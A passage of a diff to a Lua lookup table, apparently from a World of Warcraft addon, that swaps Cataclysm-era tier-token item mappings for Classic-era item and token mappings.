-- Drakeclaw Band of the Harbinger + ["220628"] = { + 221363, -- Scapula of the Fallen Avatar }, - -- Stormrider's Shoulderwraps - ["65203"] = { - 65089, -- Shoulders of the Forlorn Vanquisher + -- Drakeclaw Band of the Blood Prophet + ["220629"] = { + 221363, -- Scapula of the Fallen Avatar }, - -- Lightning-Charged Tunic - ["65204"] = { - 67424, -- Chest of the Forlorn Protector + -- Drakeclaw Band of the Juggernaut + ["220630"] = { + 221363, -- Scapula of the Fallen Avatar }, - -- Lightning-Charged Gloves - ["65205"] = { - 67430, -- Gauntlets of the Forlorn Protector + -- Atal'ai Blood Icon + ["220636"] = { + 220642, -- Banished Martyr's Plate Armor + 220643, -- Banished Martyr's Plate Legguards + 220648, -- Banished Martyr's Plate Boots + 220650, -- Obsessed Prophet's Chestplate + 220651, -- Obsessed Prophet's Legguards + 220652, -- Obsessed Prophet's Ornate Boots + 220653, -- Wailing Berserker's Chestplate + 220654, -- Wailing Berserker's Legplates + 220656, -- Wailing Berserker's Battleboots + 220657, -- Ostracized Berserker's Hauberk + 220658, -- Ostracized Berserker's Legplates + 220659, -- Ostracized Berserker's Chain Greaves + 220660, -- Shunned Devotee's Chainshirt + 220661, -- Shunned Devotee's Legguards + 220662, -- Shunned Devotee's Scale Boots + 220663, -- Corrupted Spiritweaver's Leggings + 220664, -- Corrupted Spiritweaver's Sabatons + 220665, -- Corrupted Spiritweaver's Breastplate + 220666, -- Dread Hunter's Chainmail + 220667, -- Dread Hunter's Chausses + 220668, -- Dread Hunter's Greaves + 220676, -- Blood Corrupted Tunic + 220677, -- Blood Corrupted Boots + 220678, -- Blood Corrupted Pants + }, + -- Atal'ai Ritual Token + ["220637"] = { + 220669, -- Exiled Prophet's Jerkin + 220670, -- Exiled Prophet's Slippers + 220671, -- Exiled Prophet's Leather Pants + 220672, -- Lost Worshipper's Harness + 220673, -- Lost Worshipper's Leggings + 220675, -- Lost Worshipper's Treads + 220679, -- Malevolent Prophet's Leggings + 220680, -- Malevolent Prophet's Vest + 220681, -- Malevolent Prophet's Sandals + 220683, -- Benevolent Prophet's Vest + 220684, -- Benevolent Prophet's Leggings + 220685, -- Benevolent Prophet's Sandals + 220778, -- Coagulated Bloodguard Pants + 220779, -- Coagulated Bloodguard Tunic + 220780, -- Coagulated Bloodguard Boots + 220781, -- Nightmare Prophet's Leggings + 220783, -- Nightmare Prophet's Vestments + 220784, -- Nightmare Prophet's Sandals + }, + -- Banished Martyr's Plate Armor + ["220642"] = { + 220636, -- Atal'ai Blood Icon }, - -- Lightning-Charged Headguard - ["65206"] = { - 65000, -- Crown of the Forlorn Protector + -- Banished Martyr's Plate Legguards + ["220643"] = { + 220636, -- Atal'ai Blood Icon }, - -- Lightning-Charged Legguards - ["65207"] = { - 67427, -- Leggings of the Forlorn Protector + -- Banished Martyr's Plate Boots + ["220648"] = { + 220636, -- Atal'ai Blood Icon }, - -- Lightning-Charged Spaulders - ["65208"] = { - 65087, -- Shoulders of the Forlorn Protector + -- Obsessed Prophet's Chestplate + ["220650"] = { + 220636, -- Atal'ai Blood Icon }, - -- Firelord's Gloves - ["65209"] = { - 67431, -- Gauntlets of the Forlorn Vanquisher + -- Obsessed Prophet's Legguards + ["220651"] = { + 220636, -- Atal'ai Blood Icon }, - -- Firelord's Hood - ["65210"] = { - 65002, -- Crown of the Forlorn Vanquisher + -- Obsessed Prophet's Ornate Boots + ["220652"] = { + 220636, -- Atal'ai Blood Icon }, - -- Firelord's Leggings - ["65211"] = { - 67426, -- Leggings of the Forlorn Vanquisher + -- Wailing Berserker's Chestplate + ["220653"] = { + 220636, -- Atal'ai Blood Icon }, - -- Firelord's Robes - ["65212"] = { - 67425, -- Chest of the Forlorn Vanquisher + -- Wailing Berserker's Legplates + ["220654"] = { + 220636, -- Atal'ai Blood Icon }, - -- Firelord's Mantle - ["65213"] = { - 65089, -- Shoulders of the Forlorn Vanquisher + -- Wailing Berserker's Battleboots + ["220656"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Battleplate - ["65214"] = { - 67423, -- Chest of the Forlorn Conqueror + -- Ostracized Berserker's Hauberk + ["220657"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Gauntlets - ["65215"] = { - 67429, -- Gauntlets of the Forlorn Conqueror + -- Ostracized Berserker's Legplates + ["220658"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Helmet - ["65216"] = { - 65001, -- Crown of the Forlorn Conqueror + -- Ostracized Berserker's Chain Greaves + ["220659"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Legplates - ["65217"] = { - 67428, -- Leggings of the Forlorn Conqueror + -- Shunned Devotee's Chainshirt + ["220660"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Pauldrons - ["65218"] = { - 65088, -- Shoulders of the Forlorn Conqueror + -- Shunned Devotee's Legguards + ["220661"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Breastplate - ["65219"] = { - 67423, -- Chest of the Forlorn Conqueror + -- Shunned Devotee's Scale Boots + ["220662"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Gloves - ["65220"] = { - 67429, -- Gauntlets of the Forlorn Conqueror + -- Corrupted Spiritweaver's Leggings + ["220663"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Headguard - ["65221"] = { - 65001, -- Crown of the Forlorn Conqueror + -- Corrupted Spiritweaver's Sabatons + ["220664"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Greaves - ["65222"] = { - 67428, -- Leggings of the Forlorn Conqueror + -- Corrupted Spiritweaver's Breastplate + ["220665"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Mantle - ["65223"] = { - 65088, -- Shoulders of the Forlorn Conqueror + -- Dread Hunter's Chainmail + ["220666"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Chestguard - ["65224"] = { - 67423, -- Chest of the Forlorn Conqueror + -- Dread Hunter's Chausses + ["220667"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Handguards - ["65225"] = { - 67429, -- Gauntlets of the Forlorn Conqueror + -- Dread Hunter's Greaves + ["220668"] = { + 220636, -- Atal'ai Blood Icon }, - -- Reinforced Sapphirium Faceguard - ["65226"] = { - 65001, -- Crown of the Forlorn Conqueror + -- Exiled Prophet's Jerkin + ["220669"] = { + 220637, -- Atal'ai Ritual Token }, - -- Reinforced Sapphirium Legguards - ["65227"] = { - 67428, -- Leggings of the Forlorn Conqueror + -- Exiled Prophet's Slippers + ["220670"] = { + 220637, -- Atal'ai Ritual Token }, - -- Reinforced Sapphirium Shoulderguards - ["65228"] = { - 65088, -- Shoulders of the Forlorn Conqueror + -- Exiled Prophet's Leather Pants + ["220671"] = { + 220637, -- Atal'ai Ritual Token }, - -- Mercurial Handwraps - ["65229"] = { - 67429, -- Gauntlets of the Forlorn Conqueror + -- Lost Worshipper's Harness + ["220672"] = { + 220637, -- Atal'ai Ritual Token }, - -- Mercurial Cowl - ["65230"] = { - 65001, -- Crown of the Forlorn Conqueror + -- Lost Worshipper's Leggings + ["220673"] = { + 220637, -- Atal'ai Ritual Token }, - -- Mercurial Legwraps - ["65231"] = { - 67428, -- Leggings of the Forlorn Conqueror + -- Lost Worshipper's Treads + ["220675"] = { + 220637, -- Atal'ai Ritual Token }, - -- Mercurial Robes - ["65232"] = { - 67423, -- Chest of the Forlorn Conqueror + -- Blood Corrupted Tunic + ["220676"] = { + 220636, -- Atal'ai Blood Icon }, - -- Mercurial Mantle - ["65233"] = { - 65088, -- Shoulders of the Forlorn Conqueror + -- Blood Corrupted Boots + ["220677"] = { + 220636, -- Atal'ai Blood Icon }, - -- Mercurial Gloves - ["65234"] = { - 67429, -- Gauntlets of the Forlorn Conqueror + -- Blood Corrupted Pants + ["220678"] = { + 220636, -- Atal'ai Blood Icon }, - -- Mercurial Hood - ["65235"] = { - 65001, -- Crown of the Forlorn Conqueror + -- Malevolent Prophet's Leggings + ["220679"] = { + 220637, -- Atal'ai Ritual Token }, - -- Mercurial Leggings - ["65236"] = { - 67428, -- Leggings of the Forlorn Conqueror + -- Malevolent Prophet's Vest + ["220680"] = { + 220637, -- Atal'ai Ritual Token }, - -- Mercurial Vestment - ["65237"] = { - 67423, -- Chest of the Forlorn Conqueror + -- Malevolent Prophet's Sandals + ["220681"] = { + 220637, -- Atal'ai Ritual Token }, - -- Mercurial Shoulderwraps - ["65238"] = { - 65088, -- Shoulders of the Forlorn Conqueror + -- Benevolent Prophet's Vest + ["220683"] = { + 220637, -- Atal'ai Ritual Token }, - -- Wind Dancer's Tunic - ["65239"] = { - 67425, -- Chest of the Forlorn Vanquisher + -- Benevolent Prophet's Leggings + ["220684"] = { + 220637, -- Atal'ai Ritual Token }, - -- Wind Dancer's Gloves - ["65240"] = { - 67431, -- Gauntlets of the Forlorn Vanquisher + -- Benevolent Prophet's Sandals + ["220685"] = { + 220637, -- Atal'ai Ritual Token }, - -- Wind Dancer's Helmet - ["65241"] = { - 65002, -- Crown of the Forlorn Vanquisher + -- Coagulated Bloodguard Pants + ["220778"] = { + 220637, -- Atal'ai Ritual Token }, - -- Wind Dancer's Legguards - ["65242"] = { - 67426, -- Leggings of the Forlorn Vanquisher + -- Coagulated Bloodguard Tunic + ["220779"] = { + 220637, -- Atal'ai Ritual Token }, - -- Wind Dancer's Spaulders - ["65243"] = { - 65089, -- Shoulders of the Forlorn Vanquisher + -- Coagulated Bloodguard Boots + ["220780"] = { + 220637, -- Atal'ai Ritual Token }, - -- Tunic of the Raging Elements - ["65244"] = { - 67424, -- Chest of the Forlorn Protector + -- Nightmare Prophet's Leggings + ["220781"] = { + 220637, -- Atal'ai Ritual Token }, - -- Handwraps of the Raging Elements - ["65245"] = { - 67430, -- Gauntlets of the Forlorn Protector + -- Nightmare Prophet's Vestments + ["220783"] = { + 220637, -- Atal'ai Ritual Token }, - -- Faceguard of the Raging Elements - ["65246"] = { - 65000, -- Crown of the Forlorn Protector + -- Nightmare Prophet's Sandals + ["220784"] = { + 220637, -- Atal'ai Ritual Token }, - -- Legwraps of the Raging Elements - ["65247"] = { - 67427, -- Leggings of the Forlorn Protector + -- Schematic: Goblin Rocket Boots + ["221339"] = { + 7192, -- Schematic: Goblin Rocket Boots + }, + -- Scapula of the Fallen Avatar + ["221363"] = { + 220626, -- Drakeclaw Band of the Berserker + 220627, -- Drakeclaw Band of the Stalker + 220628, -- Drakeclaw Band of the Harbinger + 220629, -- Drakeclaw Band of the Blood Prophet + 220630, -- Drakeclaw Band of the Juggernaut }, - -- Mantle of the Raging Elements - ["65248"] = { - 65087, -- Shoulders of the Forlorn Protector + -- Chained Essence of Eranikus + ["221474"] = { + 10455, -- Chained Essence of Eranikus }, - -- Cuirass of the Raging Elements - ["65249"] = { - 67424, -- Chest of the Forlorn Protector + -- Essence of Eranikus + ["221475"] = { + 10454, -- Essence of Eranikus }, - -- Grips of the Raging Elements - ["65250"] = { - 67430, -- Gauntlets of the Forlorn Protector + -- Sturdy Lunchbox + ["221498"] = { + 1652, -- Sturdy Lunchbox }, - -- Helmet of the Raging Elements - ["65251"] = { - 65000, -- Crown of the Forlorn Protector + -- Princess Theradras' Scepter + ["221780"] = { + 17766, -- Princess Theradras' Scepter }, - -- Legguards of the Raging Elements - ["65252"] = { - 67427, -- Leggings of the Forlorn Protector + -- Avenguard Helm + ["221781"] = { + 10749, -- Avenguard Helm }, - -- Spaulders of the Raging Elements - ["65253"] = { - 65087, -- Shoulders of the Forlorn Protector + -- Helm of Exile + ["221782"] = { + 11124, -- Helm of Exile }, - -- Hauberk of the Raging Elements - ["65254"] = { - 67424, -- Chest of the Forlorn Protector + -- Lawbringer Shoulderplates + ["221783"] = { + 227752, -- Molten Scaled Shoulderpads }, - -- Gloves of the Raging Elements - ["65255"] = { - 67430, -- Gauntlets of the Forlorn Protector + -- Cenarion Vestments + ["221785"] = { + 227766, -- Scorched Core Chest }, - -- Headpiece of the Raging Elements - ["65256"] = { - 65000, -- Crown of the Forlorn Protector + -- Geomancer's Cord + ["223173"] = { + 14217, -- Geomancer's Cord }, - -- Kilt of the Raging Elements - ["65257"] = { - 67427, -- Leggings of the Forlorn Protector + -- Geomancer's Boots + ["223174"] = { + 14218, -- Geomancer's Boots }, - -- Shoulderwraps of the Raging Elements - ["65258"] = { - 65087, -- Shoulders of the Forlorn Protector + -- Geomancer's Cloak + ["223175"] = { + 14219, -- Geomancer's Cloak }, - -- Shadowflame Handwraps - ["65259"] = { - 67429, -- Gauntlets of the Forlorn Conqueror + -- Geomancer's Cap + ["223177"] = { + 14220, -- Geomancer's Cap }, - -- Shadowflame Hood - ["65260"] = { - 65001, -- Crown of the Forlorn Conqueror + -- Geomancer's Bracers + ["223178"] = { + 14221, -- Geomancer's Bracers }, - -- Shadowflame Leggings - ["65261"] = { - 67428, -- Leggings of the Forlorn Conqueror + -- Geomancer's Gloves + ["223180"] = { + 14222, -- Geomancer's Gloves }, - -- Shadowflame Robes - ["65262"] = { - 67423, -- Chest of the Forlorn Conqueror + -- Geomancer's Spaulders + ["223181"] = { + 14223, -- Geomancer's Spaulders }, - -- Shadowflame Mantle - ["65263"] = { - 65088, -- Shoulders of the Forlorn Conqueror + -- Geomancer's Trousers + ["223182"] = { + 14224, -- Geomancer's Trousers }, - -- Earthen Battleplate - ["65264"] = { - 67424, -- Chest of the Forlorn Protector + -- Geomancer's Wraps + ["223183"] = { + 14225, -- Geomancer's Wraps }, - -- Earthen Gauntlets - ["65265"] = { - 67430, -- Gauntlets of the Forlorn Protector + -- Rainstrider Leggings + ["223324"] = { + 11123, -- Rainstrider Leggings }, - -- Earthen Helmet - ["65266"] = { - 65000, -- Crown of the Forlorn Protector + -- Hakkari Breastplate + ["223325"] = { + 10781, -- Hakkari Breastplate }, - -- Earthen Legplates - ["65267"] = { - 67427, -- Leggings of the Forlorn Protector + -- Hakkari Shroud + ["223326"] = { + 10782, -- Hakkari Shroud }, - -- Earthen Pauldrons - ["65268"] = { - 65087, -- Shoulders of the Forlorn Protector + -- Mark of Hakkar + ["223327"] = { + 10780, -- Mark of Hakkar }, - -- Earthen Chestguard - ["65269"] = { - 67424, -- Chest of the Forlorn Protector + -- Gemburst Circlet + ["223328"] = { + 10751, -- Gemburst Circlet }, - -- Earthen Handguards - ["65270"] = { - 67430, -- Gauntlets of the Forlorn Protector + -- Lifeforce Dirk + ["223329"] = { + 10750, -- Lifeforce Dirk }, - -- Earthen Faceguard - ["65271"] = { - 65000, -- Crown of the Forlorn Protector + -- Charstone Dirk + ["223518"] = { + 17710, -- Charstone Dirk }, - -- Earthen Legguards - ["65272"] = { - 67427, -- Leggings of the Forlorn Protector + -- Eye of Theradras + ["223519"] = { + 17715, -- Eye of Theradras }, - -- Earthen Shoulderguards - ["65273"] = { - 65087, -- Shoulders of the Forlorn Protector + -- Inventor's Focal Sword + ["223520"] = { + 17719, -- Inventor's Focal Sword }, - -- Chest of the Forlorn Conqueror - ["67423"] = { - 65214, -- Reinforced Sapphirium Battleplate - 65219, -- Reinforced Sapphirium Breastplate - 65224, -- Reinforced Sapphirium Chestguard - 65232, -- Mercurial Robes - 65237, -- Mercurial Vestment - 65262, -- Shadowflame Robes + -- Rotgrip Mantle + ["223521"] = { + 17732, -- Rotgrip Mantle }, - -- Chest of the Forlorn Protector - ["67424"] = { - 65204, -- Lightning-Charged Tunic - 65244, -- Tunic of the Raging Elements - 65249, -- Cuirass of the Raging Elements - 65254, -- Hauberk of the Raging Elements - 65264, -- Earthen Battleplate - 65269, -- Earthen Chestguard + -- Helm of the Mountain + ["223522"] = { + 17734, -- Helm of the Mountain }, - -- Chest of the Forlorn Vanquisher - ["67425"] = { - 65179, -- Magma Plated Battleplate - 65184, -- Magma Plated Chestguard - 65192, -- Stormrider's Raiment - 65197, -- Stormrider's Robes - 65202, -- Stormrider's Vestment - 65212, -- Firelord's Robes - 65239, -- Wind Dancer's Tunic + -- Cloud Stone + ["223523"] = { + 17737, -- Cloud Stone }, - -- Leggings of the Forlorn Vanquisher - ["67426"] = { - 65182, -- Magma Plated Legplates - 65187, -- Magma Plated Legguards - 65191, -- Stormrider's Legguards - 65196, -- Stormrider's Legwraps - 65201, -- Stormrider's Leggings - 65211, -- Firelord's Leggings - 65242, -- Wind Dancer's Legguards + -- Fist of Stone + ["223524"] = { + 17733, -- Fist of Stone + 17943, -- Fist of Stone }, - -- Leggings of the Forlorn Protector - ["67427"] = { - 65207, -- Lightning-Charged Legguards - 65247, -- Legwraps of the Raging Elements - 65252, -- Legguards of the Raging Elements - 65257, -- Kilt of the Raging Elements - 65267, -- Earthen Legplates - 65272, -- Earthen Legguards + -- Soothsayer's Headdress + ["223525"] = { + 17740, -- Soothsayer's Headdress }, - -- Leggings of the Forlorn Conqueror - ["67428"] = { - 65217, -- Reinforced Sapphirium Legplates - 65222, -- Reinforced Sapphirium Greaves - 65227, -- Reinforced Sapphirium Legguards - 65231, -- Mercurial Legwraps - 65236, -- Mercurial Leggings - 65261, -- Shadowflame Leggings + -- Sul'thraze the Lasher + ["223526"] = { + 9372, -- Sul'thraze the Lasher }, - -- Gauntlets of the Forlorn Conqueror - ["67429"] = { - 65215, -- Reinforced Sapphirium Gauntlets - 65220, -- Reinforced Sapphirium Gloves - 65225, -- Reinforced Sapphirium Handguards - 65229, -- Mercurial Handwraps - 65234, -- Mercurial Gloves - 65259, -- Shadowflame Handwraps + -- Gahz'rilla Fang + ["223527"] = { + 9467, -- Gahz'rilla Fang }, - -- Gauntlets of the Forlorn Protector - ["67430"] = { - 65205, -- Lightning-Charged Gloves - 65245, -- Handwraps of the Raging Elements - 65250, -- Grips of the Raging Elements - 65255, -- Gloves of the Raging Elements - 65265, -- Earthen Gauntlets - 65270, -- Earthen Handguards + -- Gahz'rilla Scale Armor + ["223528"] = { + 9469, -- Gahz'rilla Scale Armor }, - -- Gauntlets of the Forlorn Vanquisher - ["67431"] = { - 65180, -- Magma Plated Gauntlets - 65185, -- Magma Plated Handguards - 65189, -- Stormrider's Grips - 65194, -- Stormrider's Handwraps - 65199, -- Stormrider's Gloves - 65209, -- Firelord's Gloves - 65240, -- Wind Dancer's Gloves + -- Jinxed Hoodoo Skin + ["223529"] = { + 9473, -- Jinxed Hoodoo Skin }, - -- Scales of Life - ["69109"] = { - 71617, -- Crystallized Firestone + -- Jinxed Hoodoo Kilt + ["223530"] = { + 9474, -- Jinxed Hoodoo Kilt }, - -- Apparatus of Khaz'goroth - ["69113"] = { - 71617, -- Crystallized Firestone + -- Big Bad Pauldrons + ["223531"] = { + 9476, -- Big Bad Pauldrons }, - -- Living Ember - ["69237"] = { - 69936, -- Fists of Fury - 69937, -- Eternal Elementium Handguards - 69938, -- Holy Flame Gauntlets - 69939, -- Dragonfire Gloves - 69941, -- Gloves of Unforgiving Flame - 69942, -- Clutches of Evil - 69943, -- Heavenly Gloves of the Moon - 69944, -- Grips of Altered Reality - 69945, -- Don Tayo's Inferno Mittens - 69946, -- Warboots of Mighty Lords - 69947, -- Mirrored Boots - 69948, -- Emberforged Elementium Boots - 69949, -- Earthen Scale Sabatons - 69950, -- Footwraps of Quenched Fire - 69951, -- Treads of the Craft - 69952, -- Ethereal Footfalls - 69953, -- Endless Dream Walkers - 69954, -- Boots of the Black Flame + -- Lifeblood Amulet + ["223532"] = { + 9641, -- Lifeblood Amulet }, - -- Branch of Nordrassil - ["69646"] = { - 71141, -- Eternal Ember + -- Desertwalker Cane + ["223533"] = { + 12471, -- Desertwalker Cane }, - -- Seething Cinder - ["69815"] = { - 71085, -- Runestaff of Nordrassil - 71086, -- Dragonwrath, Tarecgosa's Rest + -- Jumanza Grips + ["223534"] = { + 18083, -- Jumanza Grips }, - -- Fists of Fury - ["69936"] = { - 69237, -- Living Ember + -- Grimlok's Tribal Vestments + ["223535"] = { + 9415, -- Grimlok's Tribal Vestments }, - -- Eternal Elementium Handguards - ["69937"] = { - 69237, -- Living Ember + -- Grimlok's Charge + ["223536"] = { + 9416, -- Grimlok's Charge }, - -- Holy Flame Gauntlets - ["69938"] = { - 69237, -- Living Ember + -- Skullplate Bracers + ["223537"] = { + 9432, -- Skullplate Bracers }, - -- Dragonfire Gloves - ["69939"] = { - 69237, -- Living Ember + -- Kindling Stave + ["223538"] = { + 11750, -- Kindling Stave }, - -- Gloves of Unforgiving Flame - ["69941"] = { - 69237, -- Living Ember + -- Enthralled Sphere + ["223539"] = { + 11625, -- Enthralled Sphere }, - -- Clutches of Evil - ["69942"] = { - 69237, -- Living Ember + -- Houndmaster's Bow + ["223540"] = { + 11628, -- Houndmaster's Bow }, - -- Heavenly Gloves of the Moon - ["69943"] = { - 69237, -- Living Ember + -- Gemshard Heart + ["223541"] = { + 17707, -- Gemshard Heart }, - -- Grips of Altered Reality - ["69944"] = { - 69237, -- Living Ember + -- Megashot Rifle + ["223542"] = { + 17717, -- Megashot Rifle }, - -- Don Tayo's Inferno Mittens - ["69945"] = { - 69237, -- Living Ember + -- Vinerot Sandals + ["223543"] = { + 17748, -- Vinerot Sandals }, - -- Warboots of Mighty Lords - ["69946"] = { - 69237, -- Living Ember + -- Dregmetal Spaulders + ["223544"] = { + 11722, -- Dregmetal Spaulders }, - -- Mirrored Boots - ["69947"] = { - 69237, -- Living Ember + -- Gizlock's Hypertech Buckler + ["223545"] = { + 17718, -- Gizlock's Hypertech Buckler }, - -- Emberforged Elementium Boots - ["69948"] = { - 69237, -- Living Ember + -- Purification Potion + ["223912"] = { + 13462, -- Purification Potion }, - -- Earthen Scale Sabatons - ["69949"] = { - 69237, -- Living Ember + -- Major Healing Potion + ["223913"] = { + 13446, -- Major Healing Potion }, - -- Footwraps of Quenched Fire - ["69950"] = { - 69237, -- Living Ember + -- Greater Healing Potion + ["223914"] = { + 1710, -- Greater Healing Potion }, - -- Treads of the Craft - ["69951"] = { - 69237, -- Living Ember + -- Sandstalker Ankleguards + ["223962"] = { + 12470, -- Sandstalker Ankleguards }, - -- Ethereal Footfalls - ["69952"] = { - 69237, -- Living Ember + -- Embrace of the Lycan + ["223963"] = { + 9479, -- Embrace of the Lycan }, - -- Endless Dream Walkers - ["69953"] = { - 69237, -- Living Ember + -- Blade of Eternal Darkness + ["223964"] = { + 17780, -- Blade of Eternal Darkness }, - -- Boots of the Black Flame - ["69954"] = { - 69237, -- Living Ember + -- Searingscale Leggings + ["223980"] = { + 11749, -- Searingscale Leggings }, - -- Shoulderguards of the Molten Giant - ["70941"] = { - 71688, -- Mantle of the Fiery Protector + -- Flamestrider Robes + ["223981"] = { + 11747, -- Flamestrider Robes }, - -- Faceguard of the Molten Giant - ["70944"] = { - 71682, -- Helm of the Fiery Protector + -- Houndmaster's Rifle + ["223982"] = { + 11629, -- Houndmaster's Rifle }, - -- Immolation Shoulderguards - ["70946"] = { - 71681, -- Mantle of the Fiery Conqueror + -- Arbiter's Blade + ["223983"] = { + 11784, -- Arbiter's Blade }, - -- Immolation Faceguard - ["70948"] = { - 71675, -- Helm of the Fiery Conqueror + -- Silkweb Gloves + ["223984"] = { + 11634, -- Silkweb Gloves }, - -- Elementium Deathplate Shoulderguards - ["70951"] = { - 71674, -- Mantle of the Fiery Vanquisher + -- Cyclopean Band + ["223985"] = { + 11824, -- Cyclopean Band }, - -- Elementium Deathplate Faceguard - ["70954"] = { - 71668, -- Helm of the Fiery Vanquisher + -- Graverot Cape + ["223986"] = { + 11677, -- Graverot Cape }, - -- Dark Phoenix Helmet - ["71047"] = { - 71668, -- Helm of the Fiery Vanquisher + -- Splinthide Shoulders + ["223987"] = { + 11685, -- Splinthide Shoulders }, - -- Dark Phoenix Spaulders - ["71049"] = { - 71674, -- Mantle of the Fiery Vanquisher + -- Nightslayer Belt + ["226440"] = { + 16827, -- Nightslayer Belt }, - -- Flamewaker's Headguard - ["71051"] = { - 71682, -- Helm of the Fiery Protector + -- Nightslayer Gloves + ["226441"] = { + 16826, -- Nightslayer Gloves }, - -- Flamewaker's Spaulders - ["71053"] = { - 71688, -- Mantle of the Fiery Protector + -- Nightslayer Bracelets + ["226442"] = { + 16825, -- Nightslayer Bracelets }, - -- Elementium Deathplate Helmet - ["71060"] = { - 71668, -- Helm of the Fiery Vanquisher + -- Nightslayer Boots + ["226443"] = { + 16824, -- Nightslayer Boots }, - -- Elementium Deathplate Pauldrons - ["71062"] = { - 71674, -- Mantle of the Fiery Vanquisher + -- Nightslayer Shoulder Pads + ["226444"] = { + 16823, -- Nightslayer Shoulder Pads }, - -- Immolation Helmet - ["71065"] = { - 71675, -- Helm of the Fiery Conqueror + -- Nightslayer Pants + ["226445"] = { + 16822, -- Nightslayer Pants }, - -- Immolation Pauldrons - ["71067"] = { - 71681, -- Mantle of the Fiery Conqueror + -- Nightslayer Cover + ["226446"] = { + 16821, -- Nightslayer Cover }, - -- Helmet of the Molten Giant - ["71070"] = { - 71682, -- Helm of the Fiery Protector + -- Nightslayer Chestpiece + ["226447"] = { + 16820, -- Nightslayer Chestpiece }, - -- Pauldrons of the Molten Giant - ["71072"] = { - 71688, -- Mantle of the Fiery Protector + -- Nightslayer Cuirass + ["226473"] = { + 227766, -- Scorched Core Chest }, - -- Branch of Nordrassil - ["71084"] = { - 71141, -- Eternal Ember + -- Nightslayer Waistguard + ["226474"] = { + 227761, -- Scorched Core Belt }, - -- Runestaff of Nordrassil - ["71085"] = { - 69815, -- Seething Cinder + -- Nightslayer Handguards + ["226475"] = { + 227759, -- Scorched Core Gloves }, - -- Dragonwrath, Tarecgosa's Rest - ["71086"] = { - 69815, -- Seething Cinder + -- Nightslayer Bracers + ["226476"] = { + 227760, -- Scorched Core Bindings }, - -- Immolation Headguard - ["71093"] = { - 71675, -- Helm of the Fiery Conqueror + -- Nightslayer Tabi + ["226477"] = { + 227765, -- Scorched Core Boots }, - -- Immolation Mantle - ["71095"] = { - 71681, -- Mantle of the Fiery Conqueror + -- Nightslayer Pauldrons + ["226478"] = { + 227762, -- Scorched Core Shoulderpads }, - -- Obsidian Arborweave Headpiece - ["71098"] = { - 71668, -- Helm of the Fiery Vanquisher + -- Nightslayer Legguards + ["226479"] = { + 227763, -- Scorched Core Leggings }, - -- Obsidian Arborweave Spaulders - ["71101"] = { - 71674, -- Mantle of the Fiery Vanquisher + -- Nightslayer Hood + ["226480"] = { + 227764, -- Scorched Core Helm }, - -- Obsidian Arborweave Helm - ["71103"] = { - 71668, -- Helm of the Fiery Vanquisher + -- Bracers of Might + ["226484"] = { + 16861, -- Bracers of Might }, - -- Obsidian Arborweave Mantle - ["71106"] = { - 71674, -- Mantle of the Fiery Vanquisher + -- Belt of Might + ["226485"] = { + 16864, -- Belt of Might }, - -- Obsidian Arborweave Cover - ["71108"] = { - 71668, -- Helm of the Fiery Vanquisher + -- Gauntlets of Might + ["226486"] = { + 16863, -- Gauntlets of Might }, - -- Obsidian Arborweave Shoulderwraps - ["71111"] = { - 71674, -- Mantle of the Fiery Vanquisher + -- Sabatons of Might + ["226487"] = { + 16862, -- Sabatons of Might }, - -- Eternal Ember - ["71141"] = { - 69646, -- Branch of Nordrassil - 71084, -- Branch of Nordrassil + -- Helm of Might + ["226488"] = { + 16866, -- Helm of Might }, - -- Cowl of the Cleansing Flame - ["71272"] = { - 71675, -- Helm of the Fiery Conqueror + -- Breastplate of Might + ["226489"] = { + 16865, -- Breastplate of Might }, - -- Mantle of the Cleansing Flame - ["71275"] = { - 71681, -- Mantle of the Fiery Conqueror + -- Legplates of Might + ["226490"] = { + 16867, -- Legplates of Might }, - -- Hood of the Cleansing Flame - ["71277"] = { - 71675, -- Helm of the Fiery Conqueror + -- Shoulderplates of Might + ["226491"] = { + 227762, -- Scorched Core Shoulderpads }, - -- Shoulderwraps of the Cleansing Flame - ["71280"] = { - 71681, -- Mantle of the Fiery Conqueror + -- Pauldrons of Might + ["226492"] = { + 16868, -- Pauldrons of Might }, - -- Balespider's Hood - ["71282"] = { - 71675, -- Helm of the Fiery Conqueror + -- Leggings of Might + ["226493"] = { + 227763, -- Scorched Core Leggings }, - -- Balespider's Mantle - ["71285"] = { - 71681, -- Mantle of the Fiery Conqueror + -- Hauberk of Might + ["226494"] = { + 227766, -- Scorched Core Chest }, - -- Firehawk Hood - ["71287"] = { - 71668, -- Helm of the Fiery Vanquisher + -- Jaws of Might + ["226495"] = { + 227764, -- Scorched Core Helm }, - -- Firehawk Mantle - ["71290"] = { - 71674, -- Mantle of the Fiery Vanquisher + -- Treads of Might + ["226496"] = { + 227765, -- Scorched Core Boots }, - -- Erupting Volcanic Headpiece - ["71293"] = { - 71682, -- Helm of the Fiery Protector + -- Hands of Might + ["226497"] = { + 227759, -- Scorched Core Gloves }, - -- Erupting Volcanic Shoulderwraps - ["71295"] = { - 71688, -- Mantle of the Fiery Protector + -- Sash of Might + ["226498"] = { + 227761, -- Scorched Core Belt }, - -- Erupting Volcanic Faceguard - ["71298"] = { - 71682, -- Helm of the Fiery Protector + -- Armguards of Might + ["226499"] = { + 227760, -- Scorched Core Bindings }, - -- Erupting Volcanic Mantle - ["71300"] = { - 71688, -- Mantle of the Fiery Protector + -- Giantstalker's Epaulets + ["226527"] = { + 16848, -- Giantstalker's Epaulets }, - -- Erupting Volcanic Helmet - ["71303"] = { - 71682, -- Helm of the Fiery Protector + -- Giantstalker's Gloves + ["226528"] = { + 16852, -- Giantstalker's Gloves }, - -- Erupting Volcanic Spaulders - ["71305"] = { - 71688, -- Mantle of the Fiery Protector + -- Giantstalker's Belt + ["226529"] = { + 16851, -- Giantstalker's Belt }, - -- Elementium Deathplate Breastplate - ["71476"] = { - 71672, -- Chest of the Fiery Vanquisher + -- 